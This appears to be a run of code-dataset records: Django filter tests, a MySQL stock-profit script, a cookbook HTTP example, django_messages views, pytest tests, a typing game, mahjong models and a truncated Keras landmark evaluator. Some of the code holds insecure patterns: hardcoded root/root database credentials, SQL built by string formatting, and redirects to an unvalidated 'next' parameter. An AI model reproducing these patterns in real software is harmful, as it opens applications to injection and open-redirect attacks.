NOQA\n )\n\n\ndef test_get_paginator_url_with_spaces_filters():\n filters = QueryDict('sector=A+value+with+spaces+')\n\n assert helpers.get_paginator_url(filters, 'opportunities') == (\n reverse('opportunities') + '?sector=A+value+with+spaces+'\n )\n\n\ndef test_sort_opportunities_scale():\n\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 3\n },\n {\n 'scale_value': 30\n }\n ]\n\n sorting_chosen = SortFilter('Scale: High to Low')\n\n sorted_opps = sort_opportunities(opportunities, sorting_chosen)\n\n assert sorted_opps[0]['scale_value'] == 100\n assert sorted_opps[1]['scale_value'] == 30\n assert sorted_opps[2]['scale_value'] == 3\n\n\ndef test_sort_opportunities_name():\n\n opportunities = [\n {\n 'title': 'Ashton Green'\n },\n {\n 'title': 'Zoology'\n },\n {\n 'title': 'Birmingham Curzon'\n },\n ]\n\n sorting_chosen = SortFilter('Project name: A to Z')\n\n sorted_opps = sort_opportunities(opportunities, sorting_chosen)\n\n assert sorted_opps[0]['title'] == 'Ashton Green'\n assert sorted_opps[1]['title'] == 'Birmingham Curzon'\n assert sorted_opps[2]['title'] == 'Zoology'\n\n\ndef test_filter_opportunities_scale():\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 3\n },\n {\n 'scale_value': 30\n },\n {\n 'scale_value': 3000\n }\n ]\n\n filter_chosen = ScaleFilter('< £100m')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 2\n\n\ndef test_filter_opportunities_sub_sector():\n opportunities = [\n {\n 'sub_sectors': ['Energy', 'Housing'],\n },\n {\n 'sub_sectors': ['Mixed-use', 'Housing'],\n },\n {\n 'sub_sectors': ['Energy', 'Mixed-use'],\n },\n ]\n\n filter_chosen = SubSectorFilter('Housing')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 2\n\n\ndef test_filter_opportunities_scale_value_unknown():\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 1\n },\n {\n 'scale_value': '0.00'\n },\n {\n 'scale_value': 0.0\n },\n {\n 'scale_value': '0'\n },\n {\n 'scale_value': ''\n }\n ]\n\n filter_chosen = ScaleFilter('Value unknown')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 4\n\n\ndef test_filter_opportunities_scale_greater_than_1000():\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 1\n },\n {\n 'scale_value': 0\n },\n {\n 'scale_value': 3000\n }\n ]\n\n filter_chosen = ScaleFilter('> £1bn')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 1\n\n\ndef test_filter_opportunities_region():\n opportunities = [\n {'related_region': {'title': 'Midlands'}},\n {'related_region': ''},\n {'related_region': {'title': 'Midlands'}},\n {'related_region': {'title': ''}},\n ]\n\n filter_chosen = RegionFilter('Midlands')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 2\n\n\ndef test_filter_opportunities_sector():\n opportunities = [\n {\n 'related_sectors': [\n {'related_sector': {'heading': 'Aston Green'}},\n {'related_sector': {'heading': 'Birmingham Curzon'}},\n ],\n },\n {\n 'related_sectors': [\n {'related_sector': {'heading': 'Aston Green'}},\n ],\n },\n ]\n\n filter_chosen = SectorFilter('Birmingham Curzon')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 1\n\n\ndef test_filter_opportunities_multiple_filters():\n opportunities = [\n {\n 'title': 'this one',\n 'related_sectors': [\n {'related_sector': ''},\n {'related_sector': {'heading': 'Birmingham Curzon'}},\n {'related_sector': {'heading': ''}},\n ],\n 'scale_value': 0,\n 'related_region': {'title': 'Midlands'},\n\n },\n {\n 'title': 'not this one',\n 'related_sectors': [\n {'related_sector': {'heading': 'Aston Green'}},\n ],\n 'scale_value': 3000,\n 'related_region': {'title': ''},\n },\n ]\n\n filtered_opps = filter_opportunities(opportunities, SectorFilter(\n 'Birmingham Curzon'\n ))\n filtered_opps = filter_opportunities(filtered_opps, RegionFilter(\n 'Midlands'\n ))\n filtered_opps = filter_opportunities(filtered_opps, ScaleFilter(\n 'Value unknown'\n ))\n assert len(filtered_opps) == 1\n assert filtered_opps[0]['title'] == 'this one'\n","sub_path":"core/tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154736839","text":"from urllib2 import urlopen,Request\nimport json\nimport MySQLdb\nimport time\nimport os\nimport ts\n\ndef run():\n\tfile=\"/root/futu/log/daily_month_profit_calc.%d.log\" % (ts.ts())\n\tif not os.path.exists(file):\n\t\tos.system('touch %s' % file)\n\tlog=open(file,'a')\n\tlog.write(\"%f daily_calc_ma start\\n\" %(time.time()))\n\n\tconn= MySQLdb.connect(\n\t\t\thost='localhost',\n\t\t\tport = 3306,\n\t\t\tuser='root',\n\t\t\tpasswd='root',\n\t\t\tdb ='db_stock',\n\t\t\t)\n\tcur = conn.cursor()\n\tcur.execute('select * from t_stock_futu')\n\tresults = cur.fetchall()\n\n\t# get stock\n\tstocks = []\n\tfor row in results:\n\t\tstock = {'id':row[0],'se':row[1],'name':row[2],'sid':row[3]}\n\t\tstocks.append(stock)\n\t\n\t# stocks = []\n\t# stocks.append({'id':'00700'})\n\n\tcurr_mts = ts.month_ts()\n\tinsert_sql_num = 0\n\tstocks_num = 0\n\tfor stock in stocks:\n\t\tstocks_num += 1\n\t\tstock_id\t= stock['id']\n\n\t\tstock_max_ts = 0 \n\t\tmax_ts_query = \"select max(month_ts) from t_stock_month_profit_hk where stock_id='%s'\" % (stock_id)\n\t\tcur.execute(max_ts_query)\n\t\tresults = cur.fetchall()\n\t\tfor row in results:\n\t\t\tif row[0] != None:\n\t\t\t\tstock_max_ts = row[0]\n\n\t\ttarget_mts = ts.last_month_ts(curr_mts) # calc from last month\n\t\twhile target_mts > stock_max_ts:\n\t\t\tlast_mts = ts.last_month_ts(target_mts)\n\t\t\tget_month_data_query = \"select * from t_stock_history where stock_id='%s' and stock_day_ts < %d and stock_day_ts >= %d order by stock_day_ts desc\" \\\n\t\t\t\t\t\t\t\t%(stock_id,target_mts,last_mts)\n\t\t\t# print(get_month_data_query)\n\t\t\tcur.execute(get_month_data_query)\n\t\t\tresults = cur.fetchall()\n\t\t\tif len(results)<=0:\n\t\t\t\tprint('break at ts=%s for stock=%s' %(ts.htime(last_mts),stock_id))\n\t\t\t\tbreak\n\t\t\t# print('get stock[%s] data %d at ts=%s' %(stock_id,len(results),ts.htime(last_mts)))\n\n\t\t\tmin_idx = 0\n\t\t\tmax_idx = len(results)-1\n\t\t\tend_month_close = results[min_idx][5]\n\t\t\tstart_month_close = results[max_idx][5]\n\t\t\t\n\t\t\t#print('%s close=%.3f' %(ts.htime(results[min_idx][3]),results[min_idx][5]))\n\t\t\t#print('%s close=%.3f' %(ts.htime(results[max_idx][3]),results[max_idx][5]))\n\t\t\tadd_stock_profit_query = \"replace into t_stock_month_profit_hk(stock_id,month_ts,last_month_close,curr_month_close,diff) \\\n\t\t\t\t\t\tvalues('%s',%d,%.3f,%.3f,%.3f)\" \\\n\t\t\t\t\t% (stock_id,last_mts,start_month_close,end_month_close,(end_month_close-start_month_close))\n\t\t\tcur.execute(add_stock_profit_query)\n\t\t\ttarget_mts = last_mts\n\t\t\tinsert_sql_num += 1\n\n\t\tconn.commit()\n\n\n\tlog.write(\"%f search stock_num=%d, insert data=%d\\n\" %(time.time(),stocks_num,insert_sql_num))\n\tlog.write(\"%f daily_calc_ma end\\n\" %(time.time()))\n\tlog.close()\n\tcur.close()\n\tconn.close()\n\n\n\nrun()\n\t\n\n","sub_path":"sh/daily_month_profit_calc.py","file_name":"daily_month_profit_calc.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"240900132","text":"# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n# Time 2018/9/23 3:03 PM \n# Author purplecity \n# Name python_cookbook_11_1.py \n# Description \n# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n# 讲的是request 这个早就用过了\n# 只不过还有text.json这种操作\n\nfrom http.client import HTTPConnection\nfrom urllib import parse\n\nc=HTTPConnection('www.python.org',80)\nc.request(\"HEAD\",'/index.html')\nresp=c.getresponse()\n\nprint(\"Status\",resp.status)\nfor name,value in resp.getheaders():\n print(name,value)\n\n\n# 感觉可以跳过了这里\n#反正标准库是http.client 牛逼的库就是requests就用这两个\n# 包括cookie的传递 上传文件 提供自行一HTTP头 auth包含账户密码的认证等 都可以用requests\n","sub_path":"before20190507/AboutPython/cookbook/chapter11/python_cookbook_11_1.py","file_name":"python_cookbook_11_1.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"530108371","text":"from django.http import Http404, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.translation import ugettext as _\nfrom django.utils import timezone\n\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\nfrom django_messages.models import Message\nfrom django_messages.forms import ComposeForm\nfrom django_messages.utils import format_quote, get_user_model, get_username_field\n\nUser = get_user_model()\n\n\n@login_required\ndef inbox(request, template_name='django_messages/inbox.html'):\n message_list = Message.objects.inbox_for(request.user)\n return render(request, template_name, {\n 'message_list': message_list,\n })\n\n\n@login_required\ndef outbox(request, template_name='django_messages/outbox.html'):\n message_list = Message.objects.outbox_for(request.user)\n return render(request, template_name, {\n 'message_list': message_list,\n })\n\n\n@login_required\ndef trash(request, template_name='django_messages/trash.html'):\n message_list = Message.objects.trash_for(request.user)\n return render(request, template_name, {\n 'message_list': message_list,\n })\n\n\n@login_required\ndef compose(request, recipient=None, form_class=ComposeForm,\n template_name='django_messages/compose.html', success_url=None,\n recipient_filter=None):\n if request.method == \"POST\":\n sender = request.user\n form = form_class(request.POST, recipient_filter=recipient_filter)\n if form.is_valid():\n form.save(sender=request.user)\n messages.info(request, _(u\"Message successfully sent.\"))\n if success_url is None:\n success_url = reverse('messages_inbox')\n if 'next' in request.GET:\n success_url = request.GET['next']\n return HttpResponseRedirect(success_url)\n else:\n form = form_class(initial={\"subject\": request.GET.get(\"subject\", \"\")})\n if recipient is not None:\n recipients = [u for u in User.objects.filter(\n **{'%s__in' % get_username_field(): [r.strip() for r in recipient.split('+')]})]\n form.fields['recipient'].initial = recipients\n return render(request, template_name, {\n 'form': form,\n })\n\n\n@login_required\ndef reply(request, message_id, form_class=ComposeForm,\n template_name='django_messages/compose.html', success_url=None,\n recipient_filter=None, quote_helper=format_quote,\n subject_template=_(u\"Re: %(subject)s\"), ):\n parent = get_object_or_404(Message, id=message_id)\n\n if parent.sender != request.user and parent.recipient != request.user:\n raise Http404\n\n if request.method == \"POST\":\n sender = request.user\n form = form_class(request.POST, recipient_filter=recipient_filter)\n if form.is_valid():\n form.save(sender=request.user, parent_msg=parent)\n messages.info(request, _(u\"Message successfully sent.\"))\n if success_url is None:\n success_url = reverse('messages_inbox')\n return HttpResponseRedirect(success_url)\n else:\n form = form_class(initial={\n 'body': quote_helper(parent.sender, parent.body),\n 'subject': subject_template % {'subject': parent.subject},\n 'recipient': [parent.sender, ]\n })\n return render(request, template_name, {\n 'form': form,\n })\n\n\n@login_required\ndef delete(request, message_id, success_url=None):\n user = request.user\n now = timezone.now()\n message = get_object_or_404(Message, id=message_id)\n deleted = False\n if success_url is None:\n success_url = reverse('messages_inbox')\n if 'next' in request.GET:\n success_url = request.GET['next']\n if message.sender == user:\n message.sender_deleted_at = now\n deleted = True\n if message.recipient == user:\n message.recipient_deleted_at = now\n deleted = True\n if deleted:\n message.save()\n messages.info(request, _(u\"Message successfully deleted.\"))\n return HttpResponseRedirect(success_url)\n raise Http404\n\n\n@login_required\ndef undelete(request, message_id, success_url=None):\n user = request.user\n message = get_object_or_404(Message, id=message_id)\n undeleted = False\n if success_url is None:\n success_url = reverse('messages_inbox')\n if 'next' in request.GET:\n success_url = request.GET['next']\n if message.sender == user:\n message.sender_deleted_at = None\n undeleted = True\n if message.recipient == user:\n message.recipient_deleted_at = None\n undeleted = True\n if undeleted:\n message.save()\n messages.info(request, _(u\"Message successfully recovered.\"))\n return HttpResponseRedirect(success_url)\n raise Http404\n\n\n@login_required\ndef view(request, message_id, form_class=ComposeForm, quote_helper=format_quote,\n subject_template=_(u\"Re: %(subject)s\"),\n template_name='django_messages/view.html'):\n user = request.user\n now = timezone.now()\n message = get_object_or_404(Message, id=message_id)\n if (message.sender != user) and (message.recipient != user):\n raise Http404\n if message.read_at is None and message.recipient == user:\n message.read_at = now\n message.save()\n\n context = {'message': message, 'reply_form': None}\n if message.recipient == user:\n form = form_class(initial={\n 'body': quote_helper(message.sender, message.body),\n 'subject': subject_template % {'subject': message.subject},\n 'recipient': [message.sender, ]\n })\n context['reply_form'] = form\n return render(request, template_name, context)\n","sub_path":"django_messages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19453869","text":"# import\n## batteries\nimport os\nimport sys\nimport pytest\n## 3rd party\nimport numpy as np\n## package\nfrom DeepMAsED.Commands import Evaluate as Evaluate_CMD\n\n# test/data dir\ntest_dir = os.path.join(os.path.dirname(__file__))\ndata_dir = os.path.join(test_dir, 'data')\n\n# tests\ndef test_help():\n args = ['-h']\n with pytest.raises(SystemExit) as pytest_wrapped_e:\n Evaluate_CMD.parse_args(args)\n assert pytest_wrapped_e.type == SystemExit\n assert pytest_wrapped_e.value.code == 0\n\ndef test_evaluate_r3(tmpdir):\n save_path = tmpdir.mkdir('save_dir')\n model_path = os.path.join(data_dir, 'n1000_r3/', 'model')\n args = [os.path.join(data_dir, 'n1000_r3/'),\n '--model-path', model_path]\n args = Evaluate_CMD.parse_args(args)\n Evaluate_CMD.main(args)\n\ndef test_evaluate_r3_not_syn(tmpdir):\n save_path = tmpdir.mkdir('save_dir')\n model_path = os.path.join(data_dir, 'n1000_r3/', 'model')\n args = [os.path.join(data_dir, 'n1000_r3/'),\n '--model-path', model_path,\n '--is-synthetic', '0']\n args = Evaluate_CMD.parse_args(args)\n Evaluate_CMD.main(args)\n","sub_path":"tests/test_Evaluate.py","file_name":"test_Evaluate.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"413235866","text":"#!/usr/bin/python\n# __\n# / /___ __ ___ __ __\n# / __/ // / / _ \\/ // /\n# \\__/\\_, (_) .__/\\_, /\n# /___/ /_/ /___/\n\n\nfrom getkey import getkey, keys\nfrom termcolor import colored\nimport sys\nimport os\nimport time\nimport random\n\n\n# for printing via sys.stdout\ndef sysprint(inputstring):\n sys.stdout.write(inputstring)\n sys.stdout.flush()\n\n# just a countdown\ndef countdown():\n os.system('clear')\n print(\"3\")\n time.sleep(1)\n os.system('clear')\n print(\"2\")\n time.sleep(1)\n os.system('clear')\n print(\"1\")\n time.sleep(1)\n os.system('clear')\n\n# print the screen including the information\ndef printScreen():\n os.system('clear')\n timer = time.time() - start\n wpm = ((overallWordCount)/timer)*60\n print(\"WPM: {:.0f} Words: {}/{} Time: {:.3}s Sentences: {}/{} Mistakes: {}\".format(wpm, i, wordCount, timer, done, challengeCount, mistakes))\n print(\"\")\n for j in range(wordCount):\n if ( j < i ):\n sysprint(colored(words[j], 'green')+\" \")\n elif ( j == i ):\n for index in range(min(len(string),len(words[i]))):\n if ( words[i][index] == string[index] ):\n sysprint( colored(words[i][index],'green'))\n elif ( words[i][index] != string[index] ):\n sysprint( colored(words[i][index],'red'))\n for restIndex in range(min(len(string),len(words[i])), len(words[i])):\n sysprint( words[i][restIndex] )\n sysprint(\" \")\n else:\n sysprint(words[j]+\" \")\n print(\"\\n\")\n sysprint(string)\n\n# characters which can be used\nalphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,'?!:;-_\"\n\n# open a file and save it line by line in challenge\nf = open(\"sentences\",\"r\")\nchallenge = f.readlines()\n\n# initializing\noverallWordCount = 0\ndone = 0\nwpm = 0\nmistakes = 0\n\n# welcome screen\nos.system('clear')\nprint(\"{} sentences loaded.\".format(len(challenge)))\nchallengeCount=0\nprint(\"How many sentences do you want to type?\")\nwhile(challengeCount<1 or challengeCount>len(challenge)):\n challengeCount = int(input())\n if (challengeCount<1 or challengeCount>len(challenge)):\n os.system('clear')\n print(\"Please enter an amount between 0 and {}:\".format(len(challenge)))\ncountdown()\n\n# timer start\nstart = time.time()\n\nwhile(done < challengeCount):\n i=0\n string=\"\"\n randomChallenge = random.choice(challenge)\n challenge.remove(randomChallenge)\n words = randomChallenge.split()\n wordCount = len(words)\n while (i != wordCount):\n printScreen()\n key = getkey()\n if (key == \" \" or key == keys.ENTER ):\n if(string == words[i]):\n i+=1\n overallWordCount+=1\n printScreen()\n string = \"\"\n continue\n else:\n mistakes+=1\n printScreen()\n string = \"\"\n continue\n if (key == keys.BACKSPACE):\n string = string[:-1]\n continue\n for letter in alphabet:\n if key == letter:\n string = string + letter\n done+=1\n\n# end screen\nprintScreen()\nduration = time.time() - start\nprint(\"You took {:.5}s for {} words.\".format(duration,overallWordCount))\n","sub_path":"ty.py","file_name":"ty.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"334999361","text":"#-*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass Player(models.Model):\n name = models.CharField(max_length=50, unique=True)\n\n def __str__(self):\n return self.name\n\n\nclass Game(models.Model):\n player1 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player1')\n player2 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player2')\n player3 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player3')\n player4 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player4')\n flower = models.DecimalField(null=False, max_digits=9, decimal_places=2, default=0.5)\n lezi = models.IntegerField(null=False, default=5)\n huangfan = models.IntegerField(default=0)\n huangfan_executed = models.IntegerField(default=0)\n finished = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n prev_game = models.ForeignKey('self', on_delete=models.CASCADE, null=True, blank=True)\n\n def __str__(self):\n return str(self.player1) + ', ' + str(self.player2) + ', ' + str(self.player3) + ', ' + str(self.player4) + ' on ' + str(self.created.date())\n\n\nclass Hand(models.Model):\n name = models.CharField(max_length=50, unique=True)\n multiplier = models.IntegerField(null=False, default=0)\n\n def __str__(self):\n return self.name\n\n\nclass Log(models.Model):\n game = models.ForeignKey(Game, on_delete=models.CASCADE)\n delta1 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n delta2 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n delta3 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n delta4 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n winner = models.ForeignKey(Player, null=True, blank=True, on_delete=models.CASCADE, related_name='winner')\n flower = models.IntegerField(null=True, blank=True)\n hand = models.ForeignKey(Hand, null=True, blank=True, on_delete=models.CASCADE)\n _max = models.BooleanField(default=False)\n menqing = models.BooleanField(default=False)\n own = models.BooleanField(default=False)\n loser = models.ForeignKey(Player, null=True, on_delete=models.CASCADE, related_name='loser', blank=True)\n qianggang = models.BooleanField(default=False)\n huangfan = models.BooleanField(default=False)\n gangkai = models.BooleanField(default=False)\n laoyue = models.BooleanField(default=False)\n chengbao = models.ForeignKey(Player, null=True, on_delete=models.CASCADE, related_name='chengbao', blank=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n if self.winner:\n flowers = ''\n if self.hand:\n if self.hand.multiplier == 0:\n flowers = str(self.flower) + '花 '\n\n if self.own:\n out_str = str(self.winner) + ' 自摸 '\n if self._max:\n out_str += str(self.hand) + ', 大吊车'\n else:\n out_str += flowers + ' ' + str(self.hand)\n if self.gangkai:\n out_str += ', 杠开'\n if self.huangfan:\n out_str += ', 荒番'\n if self.menqing:\n out_str += ', 门清'\n if self.laoyue:\n out_str += ', 海底捞月'\n if self.chengbao:\n out_str += ', ' + str(self.chengbao) + ' 承包'\n elif self.qianggang:\n out_str = str(self.winner) + ' 杠开 '\n if self._max:\n out_str += str(self.hand) + ', 大吊车' + ', ' + str(self.loser) + ' 送杠'\n else:\n out_str += flowers + ' ' + str(self.hand) + ', ' + str(self.loser) + ' 送杠'\n if self.huangfan:\n out_str += ', 荒番'\n if self.menqing:\n out_str += ', 门清'\n if self.laoyue:\n out_str += ', 海底捞月'\n if self.chengbao:\n out_str += ', ' + str(self.chengbao) + ' 承包'\n else:\n out_str = str(self.winner) + ' '\n if self._max:\n out_str += str(self.hand) + ', 大吊车' + ', ' + str(self.loser) + ' 点炮'\n else:\n out_str += flowers + ' ' + str(self.hand) + ', ' + str(self.loser) + ' 点炮'\n if self.gangkai:\n out_str += ', 杠开'\n if self.huangfan:\n out_str += ', 荒番'\n if self.menqing:\n out_str += ', 门清'\n if self.laoyue:\n out_str += ', 海底捞月'\n if self.chengbao:\n out_str += ', ' + str(self.chengbao) + ' 承包'\n return out_str\n else:\n return '荒庄'\n\n\n\n","sub_path":"mahjong/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292271789","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Terada\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\nimport random as rn\nimport shutil\nimport datetime\nimport csv\nimport glob\nimport pandas as pd\nimport re\nfrom configparser import ConfigParser, ExtendedInterpolation\n\nfrom keras.models import Sequential, model_from_json\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam, Adamax, RMSprop, Nadam\nfrom keras.utils import np_utils\nfrom keras import backend as K\nimport tensorflow as tf\n\nimport src.read_image as imread_mod\nimport src.read_text as txtread_mod\nfrom src.data_generation import DatasetGeneration\nimport src.build_network as net\n\nclass Evaluate():\n def __init__(self, str1='Image', str2='land'):\n self.gd = DatasetGeneration(str1, str2)\n self.config = ConfigParser(interpolation=ExtendedInterpolation())\n self.flag_of_start = True\n\n def calcDiffLabel(self, _label_csv, _predict, _path):\n name = _path.split('\\\\')[len(_path.split('\\\\')) - 1]\n # get label data\n label_df = pd.read_csv(_label_csv, index_col=0)\n label_index = label_df.index\n label_column = label_df.columns\n # set column and index from label\n pred_df = pd.DataFrame(_predict, columns=label_column, index=label_index)\n # calc diff (abs)\n diff_df = abs(label_df - pred_df)\n diff_df.to_csv(self.result_path + \"diff_{0}.csv\".format(name))\n # calc cols mean\n #plt.figure()\n diff_df_mean = diff_df.mean()\n diff_df_mean.to_csv(self.result_path + \"col_mean_{0}.csv\".format(name))\n #diff_df_mean.plot.bar()\n #plt.savefig(self.result_path + \"fig_cols_mean_{0}.png\".format(name))\n # calc rows mean\n #plt.figure()\n diffT_df_mean = diff_df.T.mean()\n diffT_df_mean.to_csv(self.result_path + \"row_mean_{0}.csv\".format(name))\n #diffT_df_mean.plot.bar()\n #plt.savefig(self.result_path + \"fig_rows_mean_{0}.png\".format(name))\n\n def prediction_multi(self, _model, _X_test, _path):\n y_predict_all = _model.predict(_X_test)\n y_predict = y_predict_all[0]\n y1_predict = y_predict_all[1]\n y2_predict = y_predict_all[2]\n y3_predict = y_predict_all[3] # add\n half_size = self.input_size.max() / 2\n y_predict[0::2] = (y_predict[0::2] * half_size + half_size) * self.size_ratio[1] + 0.5\n y_predict[1::2] = (y_predict[1::2] * half_size + half_size) * self.size_ratio[0] + 0.5\n y_predict = y_predict.astype(np.int)\n dirname = _path.split('\\\\')[len(_path.split('\\\\')) - 1]\n with open(self.result_path + \"predict_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [landmark_dict[str(i)] for i in range(len(landmark_dict))]\n writer.writerow(header)\n for row in y_predict:\n writer.writerow(row)\n with open(self.result_path + \"predict1_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [genderlabel_dict[str(i)] for i in range(len(genderlabel_dict))]\n writer.writerow(header)\n for row in y1_predict:\n writer.writerow(row)\n with open(self.result_path + \"predict2_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [agelabel_dict[str(i)] for i in range(len(agelabel_dict))]\n writer.writerow(header)\n for row in y2_predict:\n writer.writerow(row)\n ## add d, x, y\n y3_predict[0::3] = (y3_predict[0::3] * half_size + half_size)\n y3_predict[1::3] = (y3_predict[1::3] * half_size + half_size) * self.size_ratio[0]\n y3_predict[2::3] = (y3_predict[2::3] * half_size + half_size) * self.size_ratio[1]\n with open(self.result_path + \"predict3_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [landmark3d_dict[str(i)] for i in range(len(landmark3d_dict))]\n writer.writerow(header)\n for row in y3_predict:\n writer.writerow(row)\n\n return y_predict\n\n def prediction(self, _model, _X_test, _path):\n y_predict = _model.predict(_X_test)\n half_size = self.input_size.max() / 2\n y_predict[0::2] = (y_predict[0::2] * half_size + half_size) * self.size_ratio[1] + 0.5\n y_predict[1::2] = (y_predict[1::2] * half_size + half_size) * self.size_ratio[0] + 0.5\n y_predict = y_predict.astype(np.int)\n dirname = _path.split('\\\\')[len(_path.split('\\\\')) - 1]\n with open(self.result_path + \"predict_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n lm_label = [landmark_dict[str(i)] for i in range(len(landmark_dict))]\n writer.writerow(lm_label)\n for row in y_predict:\n writer.writerow(row)\n\n return y_predict\n\n def calcImageRatio(self):\n self.size_ratio = np.array([self.img_size[0] / self.input_size[0], self.img_size[1] / self.input_size[1]])\n\n def model_evaluation(self, _model, _X_test, _y_test, _path):\n score = _model.evaluate(_X_test, _y_test, batch_size=self.batch_size, verbose=1)\n dirname = _path.split('\\\\')[len(_path.split('\\\\'))-1]\n with open(self.save_score, 'a', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n if self.flag_of_start:\n self.firstWrite = False\n writer.writerows([[\"\",_model.metrics_names[0], _model.metrics_names[1]]])\n writer.writerow(list([dirname, score[0], score[1]]))\n\n def run(self):\n ## Read Data\n print(\"Read File ...\")\n self.calcImageRatio()\n X_test, y_test = self.gd.load_data(self.val_image_path, self.val_label_path, self.save_labelset, self.img_size, self.input_size)\n y1_test, y2_test = self.gd.load_label() #self.result_path)\n y3_test = self.gd.load_3ddata(self.val_image_path, self.val_label3d_path, self.save_label3dset, self.img_size, self.input_size)\n\n models_dir = glob.glob(self.model_path)\n print(self.model_path)\n print(models_dir)\n for model_dir in models_dir:\n model_dirname = os.path.dirname(model_dir)\n\n ## Load Model\n print(\"Load Model : {0}\".format(model_dirname))\n json_name = '{0}/{1}'.format(model_dirname, self.load_architecture)\n weights_name = '{0}/{1}'.format(model_dirname, self.load_weights_checkpoint) #\n if not os.path.exists(weights_name):\n weights_name = '{0}/{1}'.format(model_dirname, self.load_weights) #load_weights_checkpoint\n\n model = net.select(self.network, self.input_size, 28)\n #model = model_from_json(open(json_name).read())\n model.load_weights(weights_name)\n model.compile(optimizer=Adam(), loss='mean_squared_error', metrics=['accuracy'])\n\n ## Predict TestData\n print(\"Predict TestData ...\")\n if not self.isMultiTask:\n self.model_evaluation(model, X_test, y_test, model_dirname)\n y_pre = self.prediction(model, X_test, model_dirname)\n else:\n #self.model_evaluation(model, X_test, [y_test, y1_test, y2_test], model_dirname)\n self.model_evaluation(model, X_test, [y_test, y1_test, y2_test, y3_test], model_dirname)\n y_pre = self.prediction_multi(model, X_test, model_dirname)\n\n ## Evaluate Model\n print(\"Evaluate Model ...\")\n self.calcDiffLabel(self.save_labelset, y_pre, model_dirname)\n\n def setParameter(self, _conf_file):\n self.config.read(_conf_file)\n\n ## Image Data\n conf_io = self.config['IO']\n self.img_size = np.array([conf_io.getint('image_height'),conf_io.getint('image_width')])\n self.input_size = np.array([conf_io.getint('input_height'),conf_io.getint('input_width')])\n self.input_size = self.input_size.astype(np.int)\n\n ## Dataset\n conf_d = self.config['Dataset']\n testName = conf_d['base_test']\n testOther = conf_d['base_test_plus']\n self.val_image_path = '{0}//{1}{2}//*.jpg'.format(conf_d['image_path'], testName, testOther)\n self.val_label_path = '{0}//{1}{2}//*.txt'.format(conf_d['label_path'], testName, testOther)\n self.val_label3d_path = '{0}//{1}{2}//*.txt'.format(conf_d['label3d_path'], testName, testOther)\n comment=conf_d['comment']\n targetPath = conf_d['target_path']\n\n ## Result\n now = datetime.datetime.now()\n time = \"{0:02d}{1:02d}{2:02d}{3:02d}\".format(now.month, now.day, now.hour, now.minute)\n self.result_path = './result/{0}/{1}_{2}_{3}/'.format(targetPath, testName, comment, time)\n os.makedirs(self.result_path, exist_ok=True)\n\n ## Parameter\n conf_p = self.config['Parameter']\n self.batch_size = conf_p.getint('batch_size') #128\n self.network = conf_p['net']\n\n ## Malti-Task\n conf_m = self.config['MaltiTask']\n self.isMultiTask = conf_m.getboolean('multi_task_on')\n\n ## Filename\n conf_s = self.config['File']\n self.load_architecture = 